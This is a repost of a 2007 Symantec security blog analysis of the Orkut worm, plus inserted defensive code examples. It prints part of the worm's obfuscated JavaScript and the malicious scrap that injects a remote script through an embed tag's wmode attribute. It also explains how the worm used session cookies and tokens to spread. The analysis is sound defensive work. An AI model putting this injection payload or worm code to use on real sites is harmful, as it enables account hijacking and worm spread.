Friday, December 21, 2007 8:20 AM cmosby

Symantec Security Response Weblog: The Orkut Worm Has Landed!


The Orkut Worm Has Landed!

Orkut is a popular social networking site with millions of registered users. A couple of days ago Orkut was hit with a worm that impacted close to 700,000 users in approximately 24 hours. We took a closer look at the exploit to get an idea of why so many users' systems were infected. The exploit was contained in a JavaScript file, aptly named "virus.js", which was injected using an embed tag. Here is a snippet of the JavaScript file:

function $(p,a,c,k,e,d) {
 // e(): encode an index as a base-a token (digits 0-9, then a-z, then A-Z)
 e=function(c) {
  return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))
 };
 // Build the token -> original word table from the dictionary k
 if(!''.replace(/^/,String)){
  while(c--){d[e(c)]=k[c]||e(c)}
  k=[function(e){return d[e]}];
  e=function(){return'\\w+'};
  c=1
 };
 // Replace every token in the payload p with its original word
 while(c--){
  if(k[c]){
   p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])
  }
 }
 return p
};
setTimeout(
$('5 j=0;5 q=1q["2o.H"];5 E=1q["2p.K.27"];
7 B(){Z{b i 14("29.1l")}
L(e){};Z{b i 14("2b.1l")}L(e){};Z{b i 2l()}L(e){};b J};
7 W(g,P,m,c,9,U){5 1m=g+"="+19(P)+(m?";
m="+m.2f():"")+(c?";
c="+c:"")+(9?"; 9="+9:"")+(U?"; U":"");
8.y=1m};7 v(g){5 l=8.y;5 A=g+"=";5 h=l.S("; "+A);
6(h==-1){h=l.S(A);6(h!=0){b 2h}}16{h+=2};
5 u=8.y.S(";",h);6(u==-1){u=l.M};b 2j(l.2m(h+A.M,u))};
7 26(g,c,9){6(v(g)){8.y=g+"="+(c?"; c="+c:"")+(9?";
9="+9:"")+"; m=1u, 1i-1v-1x 1g:1g:1i 1y";1U.1z(0)}};
7 G(){5 3=B();6(3){3.R("1A","o://k.w.p/1B.z",C);3.a(J);
3.Y=7(){6(3.X==4){6(3.1a==1c){5 1r=3.1Q;5 t=8.1n("t");
t.1D=1r;5 f=t.D("f").O(0);6(f){f.1M(f.D("1F").O(0));
f.1G("1H","N");f.1J.1K="1L";8.1N.1f(f);V()}}16{G()}}};
3.a(J)}};7 T(){5 a="H="+n(q)+"&K="+n(E)+"&
15.1O";5 3=B();3.R(\'q\',\'o://k.w.p/1P.z?1R=1S\',C);
3.12(\'10-1e\',\'Q/x-k-17-1b\');3.a(a);
3.Y=7(){6(3.X==4){6(3.1a!=1c){T();b};G()}}};
7 V(){6(j==8.18("N").M){b};

We can see from the above code that the JavaScript is heavily obfuscated. After decoding and analyzing the strings in the script we confirmed that it is indeed targeting Orkut users. Our analysis of the decoded JavaScript showed that when the virus.js script is executed it forces the user to join a community called “Infectados pelo Vírus do Orkut”. The name of this community is in Portuguese and translates to “Infected by Virus Orkut.”
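To show the decoding step without handing the payload to eval, here is an added example (not code from the Symantec post or from the worm) that rebuilds the token table of the "p,a,c,k,e,d" packer above and expands a constructed, benign sample in the same format; the names packerToken, unpack and demo are this example's own.

```javascript
// Added example (not from the Symantec post): decode a "p,a,c,k,e,d" packed
// string without executing it, so the recovered source can be read as text.
// Arguments mirror the packer call: p = payload whose words were replaced by
// base-`a` tokens, a = radix (62 in the worm's sample), c = token count,
// k = dictionary (an empty entry means the token stands for itself).

function packerToken(n, radix) {
  // Encode index n in the packer alphabet 0-9, a-z, A-Z (most significant first).
  const high = n < radix ? '' : packerToken(Math.floor(n / radix), radix);
  const low = n % radix;
  return high + (low > 35 ? String.fromCharCode(low + 29) : low.toString(36));
}

function unpack(p, a, c, k) {
  // Build the token -> word table exactly as the packer's inner loop does.
  const words = Object.create(null);
  for (let i = 0; i < c; i++) {
    const tok = packerToken(i, a);
    words[tok] = k[i] || tok;
  }
  // One pass over every \w+ run; words not in the table are left untouched.
  return p.replace(/\b\w+\b/g, (tok) => (tok in words ? words[tok] : tok));
}

// Constructed sample in the same format (a benign payload, not the worm's):
const SAMPLE_P = '3 4=1.2;0(4)';
const SAMPLE_K = 'alert|document|title|var|x'.split('|');

function demo() {
  return unpack(SAMPLE_P, 62, SAMPLE_K.length, SAMPLE_K);
}
```

Running demo() returns the readable source, which is what an analyst wants to inspect before deciding whether anything should ever execute.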

This is a novel way for the author of the worm to keep track of accounts infected by the worm. The script then loads the "friends list" of the infected Orkut account and sends them a malicious scrap. The worm uses Orkut scrap entries as its vector of propagation. Below is an example of the code to define the Orkut scrap:

2008 vem ai… que ele comece mto bem par avc
<br/>
[silver]RL Wed Dec 19 14:57:48 UTC+0530 2007[/silver]
<br/>
<embed src=http://www.orkut.com/LoL.aspx type=
"application/x-shockwave-flash" wmode="transparent');
script=document.createElement('script');
script.src='http://files.myopera111.com/[REMOVED].js';
document.getElementsByTagName('head')[0].appendChild(script);
escape('" width="1" height="1">
</embed>

When you look at the code there are a few attributes for the embed tag, such as wmode, width and height. The embed tag uses these attributes to create the Flash object that displays the Flash content. Now look closely at the wmode attribute:

wmode="transparent');

The author has closed the wmode value with '); and has appended script code inside the attribute value itself. Let's analyze this further. We tested the script with a variant of the malicious scrap:

<embed src="http://www.orkut.com/LoL.aspx" type="application/x-shockwave-flash" wmode="transparent" width="1" height="1">

When Orkut parsed this scrapbook entry, we found it behaved in a similar way to the following code in an Orkut page:

<script type="text/javascript">
var flashWriter = new _SWFObject('http://www.orkut.com/LoL.aspx',
   '337533968', '1', '1', '9', '#FFFFFF',
   'autohigh', '', '', '337533968');
flashWriter._addParam('wmode', 'transparent');
flashWriter._addParam('allowNetworking', 'internal');
flashWriter._addParam('allowScriptAccess', 'never');
flashWriter._setAttribute('style', '');
flashWriter._write('flashDiv337533968');</script>

The Orkut application parsed the scrap text and created the Flash object with the values specified in the scrap.
If we look at the rendered source of the malicious scrap it looks like the sample below; the injected code is the three lines between the wmode and allowNetworking parameters. Note the trailing escape('') call: the payload ends with escape(' so that the '); Orkut appends after the attribute value completes a harmless statement instead of breaking the script's syntax:

flashWriter._addParam('wmode', 'transparent');
script = document.createElement('script');
script.src = 'http://files.myopera.com/virusd[REMOVED]';
document.getElementsByTagName('head')[0].appendChild(script);
escape('');
flashWriter._addParam('allowNetworking', 'internal');
flashWriter._addParam('allowScriptAccess', 'never');

Based on what we have seen so far, we can infer that the Orkut application's filters failed to validate this attribute value in the request: the whole wmode value was taken as-is and placed into the rendering code:

flashWriter._addParam('wmode', 'transparent'); (malicious script)
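The rendering step just described, modelled as an added example (not Symantec's or Orkut's code): a concatenating renderer that reproduces the injection beside a hardened one that restricts wmode to its defined values and emits every value as an encoded JavaScript string literal. The placeholder URL, the function names and the countStatements helper are this example's own assumptions.

```javascript
// Added example (not Symantec's or Orkut's code): a model of the rendering step
// the post describes, where a scrap's wmode value is copied into the page's
// flashWriter._addParam('wmode', '...') call. The value below has the shape of
// the post's sample scrap, with a placeholder script URL instead of the real one.

const SCRAP_WMODE =
  "transparent');script=document.createElement('script');" +
  "script.src='http://example.invalid/PLACEHOLDER.js';" +
  "document.getElementsByTagName('head')[0].appendChild(script);escape('";

// Vulnerable renderer: the attribute value is concatenated into JavaScript
// unchanged, which is what the post infers Orkut's filter allowed.
function renderParamUnsafe(name, value) {
  return "flashWriter._addParam('" + name + "', '" + value + "');";
}

// Hardened renderer: wmode must be one of the values Flash defines, and every
// value is emitted as an encoded string literal, so quotes or parentheses inside
// it stay inside the literal.
const WMODE_ALLOWED = new Set(['window', 'opaque', 'transparent']);

function jsString(value) {
  // JSON encoding escapes quotes, backslashes and newlines; '<' is escaped too
  // so a value can never close the surrounding <script> element.
  return JSON.stringify(String(value)).replace(/</g, '\\u003c');
}

function renderParamSafe(name, value) {
  if (name === 'wmode' && !WMODE_ALLOWED.has(value)) {
    throw new Error('rejected wmode value: ' + value);
  }
  return 'flashWriter._addParam(' + jsString(name) + ', ' + jsString(value) + ');';
}

// Count statements in rendered output after blanking string literals; output
// that stays inside the single _addParam call yields exactly 1.
function countStatements(js) {
  const noStrings = js.replace(/'(?:\\.|[^'\\])*'|"(?:\\.|[^"\\])*"/g, '""');
  return (noStrings.match(/;/g) || []).length;
}
```

With the sample value, renderParamUnsafe yields five statements (the original call plus the four injected ones), while renderParamSafe rejects it outright and keeps any other value inside one call.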

In this way the worm inserts a malicious script using the embed tag and uses it for exploitation. Interestingly, a victim doesn't need to click on the scrap: when the scrapbook is loaded, the malicious embed code loads the virus.js file silently. The JavaScript takes the cookies and tokens of the logged-in user and uses them to spread the worm further.

This worm illustrates how a simple script injection exploit could affect a large social networking site. Remember, users didn’t have to click anything as the malicious script runs silently as soon as the page is loaded. This worm could have been used for other malicious purposes, such as stealing cookies, exploiting other vulnerabilities, or stealing sensitive data as well.

As of today, the virus.js script is no longer available on the site and it seems as if there have been adequate checks implemented by Orkut to validate content when posting a scrap. The malicious scraps have also been deleted from the scrapbook of the infected users.

Symantec has built a number of excellent Web browsing protections into our 2008 product range.
The worm is detected by Symantec's antivirus products with certified definitions of 12/19/2007 rev. 7 and greater as JS.Woorkut. We recommend that you keep your Symantec products up-to-date, patch your systems, and run your browser with limited options enabled.

Posted by Umesh Wanve on December 20, 2007 08:30 AM

Source: Symantec Security Response Weblog: The Orkut Worm Has Landed!
